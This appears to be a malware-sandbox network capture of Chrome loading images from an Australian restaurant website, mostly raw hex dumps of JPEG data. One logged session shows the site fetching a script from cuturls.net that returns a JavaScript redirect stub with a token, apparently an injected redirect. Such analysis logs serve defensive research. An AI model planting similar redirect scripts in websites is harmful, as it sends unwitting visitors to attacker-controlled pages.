                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 157146
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:58 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:58 UTC16030INData Raw: ff d8 ff e1 1b 40 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 06 40 00 00 01 01 00 03 00 00 00 01 04 2c 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 33 3a 31 30 3a 30 35 20 31 37 3a 31 39 3a 32 36 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: @ExifMM*@,(1"2i$''Adobe Photoshop CC 2015 (Windows)2023:10:05 17:19:26
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 22 3e 20 3c 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 20 72 64 66 3a 61 62 6f 75 74 3d 22 22 20 78 6d 6c 6e 73 3a 78 6d 70 4d
                                                                                                                                                    Data Ascii: ="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpM
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: a3 bd 5c 5f cc 65 d9 3a 3d 0e 71 ad db c9 ce ff 00 b4 36 42 84 b9 39 33 70 72 7c f4 a7 fc d2 8d 82 a3 c4 92 b1 90 9d a0 4d d0 c3 71 0b b3 53 13 4e 8c c9 b8 68 cd dc 7b 1c 6e 03 e6 7d 92 0b 2a 8c da b4 51 e8 6d 0d e4 77 69 e7 3d 94 d3 c2 f8 8c 93 45 35 14 5a 35 67 25 25 1a 0f 8a fa 0c 3a 5f 57 2d aa fa 9d 27 99 b2 41 54 af f3 1d 03 96 3f 3e fa ad 48 39 ab b5 7b 02 35 5f e3 d5 4a 62 22 12 2c b0 bc d4 7b b9 3f 4f f0 ba 9b f6 46 89 27 e1 2c 8d e0 66 42 c9 65 85 d1 64 71 f2 cd c9 7b d1 e3 e5 1c 66 f0 0f 45 cd ee 80 ae 51 e7 71 ee 0d 76 a7 d7 e9 3e 33 b4 ed 0e a0 f8 5b 8c 49 3b 8b c9 f1 d2 34 f2 b4 6c 85 de 24 cd 8e 44 ec 09 56 c2 5b 82 5b 7c b6 bf 2f 2a 6b 04 3f 4c f6 bc e7 05 f3 de c1 21 9a 5e 3e b5 51 2f bf 2b cc 37 4b 57 9f a2 52 64 85 21 81 93 d2 2a 50 1a
                                                                                                                                                    Data Ascii: \_e:=q6B93pr|MqSNh{n}*Qmwi=E5Z5g%%:_W-'AT?>H9{5_Jb",{?OF',fBedq{fEQqv>3[I;4l$DV[[|/*k?L!^>Q/+7KWRd!*P
                                                                                                                                                    2024-10-01 04:26:58 UTC15252INData Raw: 71 8d 16 18 5a 67 e0 88 4c fe b9 03 c0 72 50 42 00 8a f8 8b b2 65 76 7d 56 39 12 7e 0c 26 2e 23 4f b1 13 61 c4 d2 dc 36 cd de b9 1e 53 b7 68 8b c6 c8 56 6c 59 88 83 27 57 5f 20 db 98 8d 2b 69 9f d2 d1 93 e0 88 12 35 70 57 88 c7 11 04 b0 46 18 0b 5f 23 65 78 1d 77 d7 ce 3e 5e 66 50 d1 18 e7 63 75 75 87 85 ad 3a b5 8a 46 c5 c1 45 a7 99 10 59 88 d1 4e 25 6f 1d 33 09 88 04 ac e0 0f b3 e2 2c 79 70 07 f9 4b 47 18 54 45 51 1a b0 62 ea 08 9a c1 a3 d2 12 50 7e b3 f7 89 8f 9c 4c 4f 29 43 a3 b7 91 76 ba de a1 1b 55 aa b5 4a dc 30 d5 6b 61 8b 0e 2e b8 3c 7e aa fa 8a d3 30 1f d2 e2 63 e4 08 12 62 16 8e b1 d6 56 72 2b fe 05 5b 22 11 0c 7f a9 9c c2 65 2d 36 f7 c6 28 d2 62 5f 6d 6b 17 ee 1b 0b dd ce 67 8c 41 99 62 4a 9f 33 84 45 c4 ac 66 5d d7 e2 35 44 46 5c 0a 57 30 56
                                                                                                                                                    Data Ascii: qZgLrPBev}V9~&.#Oa6ShVlY'W_ +i5pWF_#exw>^fPcuu:FEYN%o3,ypKGTEQbP~LO)CvUJ0ka.<~0cbVr+["e-6(b_mkgAbJ3Ef]5DF\W0V
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: 62 5f 66 63 7f 38 07 08 df 51 6d c4 aa d8 2d cc 2b 15 b1 2b 68 f0 1c 47 69 78 cc ad 62 fd 46 78 b0 98 20 33 94 e5 fa 58 7d b1 fa 96 08 c2 09 4b 43 31 08 f9 10 45 87 e7 13 11 16 20 88 b3 c5 3c 64 4f b1 2e 39 5e 32 c3 29 fb 94 bf 15 df bc 96 06 56 7f 59 86 56 d3 69 a3 b4 09 ca 22 71 86 ae 52 ca e1 aa 11 88 b6 18 b6 e6 16 94 34 31 fe a7 28 c3 30 2c 61 16 bc c5 86 66 66 62 63 f4 b8 fb 73 f4 23 88 e3 e3 5d be c7 ec 44 3f 22 08 b0 fc e2 62 2a c5 11 16 72 c4 37 08 5c 46 fb 5c c3 2a 59 55 ec ab 69 e4 ca b1 56 66 66 66 66 66 67 e1 da 28 e4 77 ff 00 8c 1c 60 f9 3f 16 d7 14 e2 57 f5 01 95 36 0d 57 e0 35 b0 5b 18 c5 12 df dd 4f d0 10 7c e6 66 06 81 66 27 2c 47 6c 9b 3f 65 62 61 a4 98 c6 30 cc 46 fb a0 fd 18 7e 44 10 3e 23 db 2a 31 a0 30 18 af 98 a3 31 4c 5b 23 d3 3c
                                                                                                                                                    Data Ascii: b_fc8Qm-++hGixbFx 3X}KC1E <dO.9^2)VYVi"qR41(0,affbcs#]D?"b*r7\F\*YUiVfffffg(w`?W6W5[O|ff',Gl?eba0F~D>#*101L[#<
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: 54 c2 ed c8 1c 87 38 3b 7d 85 46 7a df bf 76 5e b9 b3 eb 5e d5 d3 fb 16 83 a4 fe 4a 52 cc cf de 6c ea d7 60 df d3 db a4 ff 00 bb d6 a5 d0 ea ee 01 4a 65 02 09 fc 40 de e4 68 b2 a6 70 89 e3 4a a8 72 bd af 71 d5 74 ba dd af bd 51 fd 1b fb 1d ee c6 dd 7e 9f cd 3a 52 fa f6 68 15 f1 a5 b9 3f c7 0f 52 91 6d 2d 9d fe 9e bb c1 f5 a5 ae 6b 75 6c 89 67 5a 8c 3f a8 e8 7f a1 e4 8d cf 58 f9 fb 50 29 ec b7 10 55 d8 7f 62 6c f5 54 db 55 16 ee 6a d1 a9 da 68 b4 4d ed 53 6b a7 dd 33 b2 fe cb 1b 39 73 7b 2a 50 9b 2b 7b 07 65 1b fd 8a d6 76 f7 6d d8 b3 d9 3b fe 9f d4 ba ff 00 67 f6 ce df d9 7b 4c e4 ea d5 ca 25 1e 34 d5 a5 ec 3a 5d 63 13 d3 fa e6 36 7a ce be bd 54 f1 57 8a 42 e2 de 32 de 38 73 39 b5 65 ed c9 e5 f4 8d 07 12 6e 76 ad 2f da fb bf 61 59 dc e4 74 7d e7 67 d2 ee
                                                                                                                                                    Data Ascii: T8;}Fzv^^JRl`Je@hpJrqtQ~:Rh?Rm-kulgZ?XP)UblTUjhMSk39s{*P+{evm;g{L%4:]c6zTWB28s9env/aYt}g
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: 5f 42 de e0 5f 6f 56 db 1b ad e8 6d 36 74 fd 05 7d 7f 55 eb 7b 76 ea 17 dd 4e 3d d7 71 6e fd be ef df f5 fd 27 5d ea 9e a1 ec bf 91 bd a3 d2 bd 37 a6 f5 0f 5e 96 58 aa 3f 23 7e 42 ea bd 5b a6 f6 df 6a ed fd ab ba 28 b1 11 73 c7 ec 08 89 2a 45 94 d5 f5 fd 34 ba ed 6a 58 04 e5 c9 2a 62 96 b7 f3 e9 5d b1 57 11 2e d9 fe c5 da d5 f8 e9 d6 af fc c8 b9 aa ce 20 5e bf c3 68 2a 4a 51 76 ad ae ba 0c fe a2 aa f8 fe d2 96 f2 78 18 83 42 04 ba b6 35 db 5e 2a bc aa cb ee b6 d5 fe 53 f1 ff 00 e4 9d 9f 54 da d1 dd d5 dd d5 29 90 44 f6 4f 5a d1 ee 35 3d eb d0 37 3d 6e fe 9b dc 7b 3d 4a b5 bf 28 55 8e b7 df 3a 7b c6 e7 e4 5d 1a df b2 fc b3 d3 6b d3 dc 7b bf b0 77 1b 1b 2f b9 bb bd af d2 5b 7e dd 9e be f4 1a b4 5e b9 ea 3d de 87 5d d7 bf e4 0d e3 d1 6c fd 9f 40 ed b6 7a 5b
                                                                                                                                                    Data Ascii: _B_oVm6t}U{vN=qn']7^X?#~B[j(s*E4jX*b]W. ^h*JQvxB5^*ST)DOZ5=7=n{=J(U:{]k{w/[~^=]l@z[
                                                                                                                                                    2024-10-01 04:26:58 UTC16336INData Raw: 76 ae cf 4f fe 49 c3 45 33 f3 47 ec 24 6b 4b d6 b5 52 8a 8e 9d a8 9f 62 77 74 f2 1b 63 25 e7 b9 51 9a d4 e6 ef 87 85 76 2e cf 55 51 fb 54 ba a3 c9 06 08 fd 6d e5 eb 27 6e d0 e1 57 c3 25 a6 3b a9 e6 90 72 b5 c4 2a 79 df 31 bd df 42 66 3c db a4 ac a5 c9 fd 91 14 ce c3 52 a5 bb 13 99 ec e1 15 c8 07 c6 79 a8 9c e4 6f 56 aa a1 4b 93 85 2d 2c d7 27 90 c9 55 9f 32 7d b9 93 b3 be 22 5b 7d 61 2f 24 6d 1e 72 75 f3 07 8f 50 78 6e 4e 15 c1 bc a8 cd 97 7a 89 9d f0 ab d0 18 3d c5 54 67 4c ad 85 6c de 6b 96 9b 88 a4 15 26 90 0e e9 a2 6b e4 1f 32 6f 12 d3 74 bd 2b d4 81 f9 ba 89 37 40 77 55 91 4a e3 29 35 a4 4b 11 3d c4 d7 11 65 aa 66 36 1e cf 37 6a d8 cf 6e f4 68 0e 17 78 cb 89 9f b1 07 33 df 16 49 09 d9 48 d0 98 f2 8f 60 89 ae 61 bb 80 16 f0 27 ea 9a 0a ff 00 a8 86 39
                                                                                                                                                    Data Ascii: vOIE3G$kKRbwtc%Qv.UQTm'nW%;r*y1Bf<RyoVK-,'U2}"[}a/$mruPxnNz=TgLlk&k2ot+7@wUJ)5K=ef67jnhx3IH`a'9
                                                                                                                                                    2024-10-01 04:26:58 UTC48INData Raw: c7 fd 3b 40 43 c9 03 12 21 7d 51 e5 2f 1f 20 31 fd 44 ec c4 e6 24 f8 49 53 c9 5a 32 92 47 7c b7 15 ce 8e 1e 9d 09 4d 6b db 73 36 16 4c 7a da c4
                                                                                                                                                    Data Ascii: ;@C!}Q/ 1D$ISZ2G|Mks6Lz
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: 3c 2e d7 13 2b e6 91 cc 8b 35 30 a6 b1 b1 0e ea d9 40 b9 50 f1 db bc eb 60 d0 57 32 36 c4 a8 e2 a8 ed 88 77 95 e6 eb e6 f5 f2 b8 09 3d 91 c6 0d 74 86 5c 22 28 0f 45 1c ba a9 8b 2c 16 10 93 7a c5 91 4b 3e ad ff 00 95 ad c3 d3 e2 7c 36 fa bb ff 00 c4 52 4b 1c b0 b1 69 df f9 8d 24 92 72 b5 20 37 5b cc e4 1f 2c c8 3f bb e6 2d 4e 97 40 51 f5 39 f2 0e ba c2 11 b7 f7 42 78 c1 1f ce 93 8d f9 65 f3 7a c9 b9 7a 98 28 6d 68 c6 04 25 5f 65 33 c8 d8 7c 0d da a3 03 a8 91 38 90 91 dd b0 78 47 c0 8e 17 21 e6 86 2e 5b 37 60 9a 82 6a db a7 d5 7b a9 bd 6d d2 40 6c f7 5d f7 3f e8 c2 4c f2 8c 57 c8 55 ec 23 ca 29 a0 90 99 88 b2 aa b3 f9 5e 1e a5 05 9a b0 6f e5 75 f1 35 b3 44 5e 12 df 0f 04 8a ce a3 17 cc 74 d3 7b 74 fd 4a 36 f7 27 e1 2f d9 1f 82 45 b3 0a d8 e9 a8 f9 73 20 db
                                                                                                                                                    Data Ascii: <.+50@P`W26w=t\"(E,zK>|6RKi$r 7[,?-N@Q9Bxezz(mh%_e3|8xG!.[7`j{m@l]?LWU#)^ou5D^t{tJ6'/Es


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    142192.168.2.449911162.210.196.1684435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:27:00 UTC533OUTGET /eWD0j3 HTTP/1.1
                                                                                                                                                    Host: cuturls.net
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:27:00 UTC452INHTTP/1.1 200 OK
                                                                                                                                                    accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                    cache-control: max-age=0, private, must-revalidate
                                                                                                                                                    connection: close
                                                                                                                                                    content-length: 479
                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:59 GMT
                                                                                                                                                    server: Cowboy
                                                                                                                                                    set-cookie: sid=66d66c67-7fad-11ef-aacb-50b3635f2f68; path=/; domain=.cuturls.net; expires=Sun, 19 Oct 2092 07:41:07 GMT; max-age=2147483647; secure; HttpOnly
                                                                                                                                                    2024-10-01 04:27:00 UTC479INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 73 3a 2f 2f 63 75 74 75 72 6c 73 2e 6e 65 74 2f 65 57 44 30 6a 33 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 7a 63 32 4e 44 41 79 4d 43 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 33 4e 7a 55 32 4f 44 49 77 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62
                                                                                                                                                    Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('https://cuturls.net/eWD0j3?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNzc2NDAyMCwiaWF0IjoxNzI3NzU2ODIwLCJpc3MiOiJKb


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    143192.168.2.449906162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:27:00 UTC654OUTGET /assets/imgs/header_2.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:27:00 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:27:00 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 206109
                                                                                                                                                    date: Tue, 01 Oct 2024 04:27:00 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:27:00 UTC16384INData Raw: ff d8 ff e1 18 35 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 06 40 00 00 01 01 00 03 00 00 00 01 02 e8 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 31 37 3a 33 37 3a 31 32 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: 5ExifMM*@(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 17:37:12
                                                                                                                                                    2024-10-01 04:27:00 UTC6016INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:27:00 UTC16384INData Raw: 4f 77 91 07 a1 cf ef f3 f1 5d 25 2b 49 01 d5 9c 3d 72 19 1d a5 2f b3 91 e9 e6 72 61 09 d3 5d b0 4a eb 1a e5 5e 00 81 37 ac 67 96 bb 69 2a 1e f6 61 31 d1 26 f3 35 ee 72 26 cb d9 2d 2b 71 d8 44 b3 56 65 31 b8 d4 e4 4f 49 8b 27 51 3f c8 48 3f 6c e8 4f 56 32 79 3d 5a e4 55 9a f5 ca 84 f5 06 85 03 44 b9 30 8d 6e 42 86 8f d1 3b 81 46 23 04 70 ca 21 4d cc 98 c2 e5 45 50 1a 42 20 dc ca 5c 81 68 e9 dd 66 b4 a1 22 20 b7 44 cc 11 97 61 28 90 98 aa 8e 6e 55 3a 24 53 61 44 bf 7e 16 27 8e d5 31 2a c1 c1 22 95 66 61 9d 68 94 f8 67 5d 11 35 ea 9b c8 e4 2d d5 90 bd e8 4a 5d 27 20 25 05 08 56 3a a1 3d 58 0e af 50 56 af 40 0f 33 4b cf 5b 65 7a cd 6d 16 18 de 6c 54 12 f3 22 cf 86 54 9c 20 55 b5 9e 50 c3 ac d2 f5 03 33 2e a6 8e 82 a4 cb 47 c7 93 a9 1b 13 6b c9 7a 26 c6 da 2d
                                                                                                                                                    Data Ascii: Ow]%+I=r/ra]J^7gi*a1&5r&-+qDVe1OI'Q?H?lOV2y=ZUD0nB;F#p!MEPB \hf" Da(nU:$SaD~'1*"fahg]5-J]' %V:=XPV@3K[ezmlT"T UP3.Gkz&-
                                                                                                                                                    2024-10-01 04:27:01 UTC16384INData Raw: 1d 27 a0 66 11 c2 82 86 c4 67 06 dc 04 0d f8 1e 5e ec 23 da c8 bb cb ee 24 c4 87 16 66 a6 99 d1 69 b9 93 ca a4 9e 90 54 9a 80 b3 3a 86 a8 20 ae c9 03 07 d5 25 a5 be 44 19 bb ab 00 12 17 b8 bd 40 b6 f9 bd 09 81 3d 32 62 8a 2b d2 af 9f ab 50 b3 41 9c ea f6 ac cd 79 9c ad 3c ae 4e a5 e9 66 91 9b e8 b3 95 d3 3f aa 3f f1 0f 65 59 fb ee 58 72 dd 8c 9f 9f 0f d8 f8 b4 5c 9b be a8 74 f9 3a 13 21 ab 95 11 ac d3 48 ed 29 78 7d 8b bb 7d 97 86 ce fa 8c f4 cf ca 27 dd f9 6e 88 cc 89 be 80 da 5a 59 11 dc 3e ee b0 52 59 58 46 a5 08 8b 00 c0 15 9c 49 a4 47 be f0 3e e7 01 a8 be d2 c7 cf 4e d2 6d a6 52 76 77 91 e3 fd 77 8f da 97 1d eb d1 37 69 46 a2 b8 56 59 36 61 5e b4 e1 b3 a0 1e 94 ac 53 46 cf b2 6c 70 6c ae dd 59 61 cc a9 33 8a 56 b3 57 31 6b 94 cd 94 09 81 8a d7 a9 89
                                                                                                                                                    Data Ascii: 'fg^#$fiT: %D@=2b+PAy<Nf??eYXr\t:!H)x}}'nZY>RYXFIG>NmRvww7iFVY6a^SFlplYa3VW1k
                                                                                                                                                    2024-10-01 04:27:01 UTC16384INData Raw: 2a 98 14 ce 06 70 2b 05 44 92 33 05 64 c5 a7 31 ea 20 22 b2 b6 d3 58 40 47 11 75 ec 7a d9 cb 1a 2a 6b 9a da b8 02 30 4d 8e 23 58 c6 1b 27 39 95 33 90 33 25 60 62 65 be e0 62 7e 44 ab 62 58 7f 10 ab c7 04 0b 0f 19 c0 60 2e 61 04 4c e3 f9 e2 1f 4c cc ff 00 1c 4c 7f f2 73 33 ff 00 43 33 33 94 63 90 12 60 08 0e 27 3c 4f 9a 7c 86 2a b3 9a 75 c9 9f 15 6b 1a a4 25 91 a2 02 a4 18 4b 18 c0 62 a6 02 64 e4 3f 19 85 68 58 e4 b1 33 cf a6 7d 31 99 c4 82 17 33 86 25 6a a6 05 52 48 45 14 2f 37 6f 36 3a 20 6b 02 89 5f 05 37 92 1a c6 ac 51 a1 5b 70 28 59 68 db a3 14 b7 ce 36 17 85 5a b5 5b 7b ba 56 25 81 33 4d 68 11 6b a9 12 cd 9e 56 35 20 2f eb 39 1f 07 e3 f0 33 03 53 4c 03 38 19 f1 98 72 22 b6 40 b6 72 56 09 c5 45 87 92 e0 05 27 0b 63 60 07 2a a8 50 ce 31 c0 85 3c 11 8f
                                                                                                                                                    Data Ascii: *p+D3d1 "X@Guz*k0M#X'933%`beb~DbX`.aLLLs3C33c`'<O|*uk%Kbd?hX3}13%jRHE/7o6: k_7Q[p(Yh6Z[{V%3MhkV5 /93SL8r"@rVE'c`*P1<
                                                                                                                                                    2024-10-01 04:27:01 UTC16384INData Raw: 67 b3 da 16 7d 9f ed 1f f2 2b a5 f7 5d ad aa 29 fb 15 5a 7d 6d 9d bd 1b 14 ff 00 c8 f1 3a a2 c5 b0 35 9a 76 6a f6 b6 50 f5 77 0e 87 5b b7 d7 67 bb 77 4e d3 46 82 ef 5e fd 0d 2b 4d bd 03 0a db a9 b5 76 3f 5a c6 75 57 11 37 2d 49 fb 59 6b 3b 41 7a 6b df d7 28 b1 2b b5 db 46 dd 45 4b eb 21 59 58 58 9c 91 74 85 63 5b 76 ed 78 36 16 d2 1a 06 9c a6 66 66 66 66 66 66 66 66 66 67 2f 40 48 82 e6 10 da a6 7e 06 7c 44 cf 33 90 85 a7 29 99 99 99 99 98 0c cc cc cc cc cc cf a2 ec da 80 ec 23 40 8a f1 91 d6 37 98 56 2f 89 5f eb 09 56 dd 34 4b 37 52 c8 ce 1a 72 10 98 0c cc e5 39 4c 93 33 0b 09 f2 21 87 66 ba bd 78 c2 c0 4a aa 67 96 d0 40 77 08 79 03 04 1e a3 f8 e2 62 11 02 66 70 10 90 23 12 d0 09 c4 18 b5 28 85 48 84 e7 d0 ac bc f0 17 ef 53 51 b7 b8 52 6d 36 ec 47 5f 8a
                                                                                                                                                    Data Ascii: g}+])Z}m:5vjPw[gwNF^+Mv?ZuW7-IYk;Azk(+FEK!YXXtc[vx6fffffffffg/@H~|D3)#@7V/_V4K7Rr9L3!fxJg@wybfp#(HSQRm6G_
                                                                                                                                                    2024-10-01 04:27:01 UTC16384INData Raw: ec e2 62 5c 3f c7 77 f7 3e 9f e9 aa 7f c2 87 2f 8f 18 98 98 98 80 40 20 13 13 13 13 8c 22 18 c6 59 1e 34 4f 2f fe 8c 61 30 4b 3f b3 46 11 a3 43 0c db d8 3a f4 53 f7 ee c0 4e 8f ec b7 f6 13 b3 ca e9 b1 e5 6b 9e 30 ac b3 c0 69 4a f2 3d 9b 7e 7d 7a 03 65 87 35 f5 ff 00 8b f5 e3 36 96 e7 65 f8 c0 70 c3 32 83 9a 8f f6 fb 3a e3 7f 66 ef 89 5a a6 66 6a c8 84 62 7b 7a 67 13 5d b9 d2 47 9f ae 1f c4 08 e9 ca 59 b0 fd 7f 67 ab f6 6d dd 39 b7 d9 3e f6 e9 38 ac 66 72 83 24 d2 e7 e6 eb 10 36 ab ab 75 a3 ad a3 64 4e ce ff 00 89 f4 88 16 7c 01 c1 0c d3 65 48 d7 fa 4b 7f dc 34 fb 78 ff 00 0d 63 16 f6 c9 cf 60 df 75 21 b6 3e 0b ba fe 29 bd 48 e4 9e c2 8f 70 63 7b 67 05 8e 65 de a2 01 e6 af 76 3c 57 f0 ba ff 00 ac 6b d5 b5 ad 56 ba 55 65 25 88 05 80 0d 39 62 7d 9f 72 c5 b7
                                                                                                                                                    Data Ascii: b\?w>/@ "Y4O/a0K?FC:SNk0iJ=~}ze56ep2:fZfjb{zg]GYgm9>8fr$6udN|eHK4xc`u!>)Hpc{gev<WkVUe%9b}r
